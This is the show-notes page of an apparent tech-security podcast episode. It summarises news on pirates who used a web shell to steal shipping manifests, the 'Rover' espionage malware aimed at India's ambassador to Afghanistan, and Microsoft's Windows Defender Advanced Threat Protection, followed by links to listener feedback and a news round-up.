We’ll tell you about the real world pirates that hacked a shipping company, the open source libraries from Mars Rover found being used in malware & Microsoft’s solution for that after-hack hangover.

Plus great questions, a packed round up & much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Pirates hacked Shipping Company to find valuable cargo

• As described in Verizon’s most recent Data Breach Digest, a collection of cyber-security case studies the company’s RISK Team helped investigate and solve sometime in the past year, a reputable global shipping conglomerate started having peculiar problems with sea pirates.
• The shipping company was telling Verizon that pirates were boarding their vessels at regular intervals.
• Equipped with a barcode reader (and weapons, of course), searching specific crates, emptying all the high-value cargo, and making off with the loot within minutes of launching their attacks.
• All of this made the shipping company think there was something strange and hired the RISK Team to track down the source of a possible leak.
• The RISK Team quickly narrowed down the problem to the firm’s outdated custom-built CMS, which featured an insecure upload script.
• As the Verizon team explained, a hacker, either part of the sea pirates group or hired by them, had uploaded a Web shell via this insecure form. In turn, this shell was uploaded inside a Web-accessible directory.
• To make things worse, that particular folder also had “execute” permissions.
• Using this access to the shipping firm’s database, the hacker pulled down BoLs (bills of lading), future shipment schedules, and ship routes so the pirates could plan their attack and identify crates holding valuable content.
• Fortunately, the hacker wasn’t that skilled. Verizon says that the attacker used a Web shell that didn’t support SSL, meaning that all executed commands were recorded in the Web server’s log.
• The RISK Team was able to recreate a historic timeline of all the hacker’s actions and identify exactly what he looked at and where he sent the files.
• Verizon’s RISK Team states:

“These threat actors, while given points for creativity, were clearly not highly skilled,” the RISK Team explains. “For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers.”

• Additionally, as a sign of their lack of skills, the attacker also didn’t use a proxy or VPN and exposed their home IP address.
• The rest of the Verizon threat digest report
• Direct PDF Download

Open source libraries from Mars Rover found being used in malware

• According to Palo Alto Networks, on December 24, 2015, India’s Ambassador to Afghanistan received a spear-phishing email that contained a new malware variant, which, if downloaded and installed, would have opened a backdoor on the official’s computer.
• India has been a trustworthy business partner for Afghanistan, helping the latter build its new Parliament complex, the Salma Dam, along with smaller transportation, energy, and infrastructure projects.
• Because of this tight collaboration between the two, it is normal that other nations or interest groups may want to know what the two countries are planning together.
• The Ambassador’s email was spoofed and made to look like it was coming from India’s Defense Minister, Manohar Parrikar. Attached to the email was an RTF file.
• Palo Alto researchers say that this file contained malicious code to exploit the CVE-2010-3333 Office XP vulnerability, resulting in the download of a file named “file.exe” from the newsumbrealla[.]net domain.
• This file was automatically launched into execution and was a simple malware payload dropper that was tasked with downloading the real threat, a new trojan that the researchers christened Rover.
• This malware was given the “Rover” name because it relied on the OpenCV and OpenAL open source libraries, both used in the software deployed with the famous Mars Rover exploration robot.
• OpenCV is a library used in computer vision applications and image processing while OpenAL is a cross-platform library for working with multichannel audio data.
• Its capabilities included the ability to take screenshots of the desktop in BMP format and send them to the C&C server every 60 minutes, logging keystrokes and uploading the data to the C&C server every 10 seconds, and scanning for Office files and uploading them to the C&C server every 60 minutes.
• Additionally, there was also a backdoor component that allowed attackers to send commands from the C&C server and tell Rover to take screenshots or start recording video (via webcam) and audio (via microphone) whenever the attacker wanted to.
• “Though ‘Rover’ is an unsophisticated malware lacking modern malware features, it seems to be successful in bypassing traditional security systems and fulfilling the objectives of the threat actor behind the campaign in exfiltrating information from the targeted victim,” Palo Alto researchers explain.
• Rover is largely undetected by today’s antivirus engines, and despite not coming with that many features, it is successful at keeping a low profile, exactly what cyber-espionage groups need from their malware to begin with.
• New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan – Palo Alto Networks Blog

Microsoft brings post-breach detection features to Windows

• Microsoft announced its new post-breach enterprise security service called Windows Defender Advanced Threat Protection, which will respond to these advanced attacks on companies’ networks.
• The company found that it currently takes an enterprise more than 200 days to detect a security breach, and 80 days to contain it. When there is such a breach, the attackers can steal company data, find private information, and damage the brand and customer trust in the company.
• For example, a social engineering attack might encourage a victim to run a program that was attached to an e-mail or execute a suspicious-looking PowerShell command. The Advanced Persistent Threat (APT) software that’s typically used in such attacks may scan ports, connect to network shares to look for data to steal, or connect to remote systems to seek new instructions and exfiltrate data. Windows Defender Advanced Threat Protection can monitor this behavior and see how it deviates from normal, expected system behavior. The baseline is the aggregate behavior collected anonymously from more than 1 billion Windows systems. If systems on your network start doing something that the “average Windows machine” doesn’t, WDATP will alert you.
• The whole thing is cloud-based with no need for any on-premises server. A client on each endpoint is needed, which would presumably be an extended version of the Windows Defender client.
• Windows Defender Advanced Threat Protection is under development, though it is currently available to some early-adopter customers.
• This service will help enterprises to detect, investigate and respond to advanced attacks on their networks.
• Microsoft said that it is building on the existing security defenses Windows 10 offers today, and the new service will provide a post-breach layer of protection to the Windows 10 security stack.
• With the client technology built into Windows 10 along with the cloud service, it will help detect threats that have made it past other defenses, provide enterprises with information to investigate the breach across endpoints, and offer response recommendations.
• To avoid Windows 7 becoming “the new Windows XP,” the company is being rather more aggressive in applying pressure on users to upgrade to Windows 10 sooner rather than later.
• WDATP is going to be part of that same push to Windows 10, and it won’t be available for older operating systems.
• Windows Defender Advanced Threat Protection uses cloud power to figure out you’ve been pwned | Ars Technica

Feedback:

• The main difference between a router and a switch.

• Penetration Testing

• Expanding 4 drive zed pool

• Allan’s Internet

Round Up:

• SSD reliability in the real world: Google’s experience
• Google suggests new “tall” hard drive form factor
• Comcast’s “Home Security System” product defeated by simple tape recorder and battery
• The story of some aweful IoT lightbulbs
• Samsung ships the world’s highest capacity SSD, with 15TB of storage
• ITU gives first-stage approval to 40Gbps FTTH standard
• Thieves Nab IRS PINs to Hijack Tax Refunds
• Cyber Criminals face same talent shortages that security firms do
• IBM researcher finds PDF library used by Microsoft Edge has serious exploits
• Abusing a wifi chip to micro-broadcast color TV signals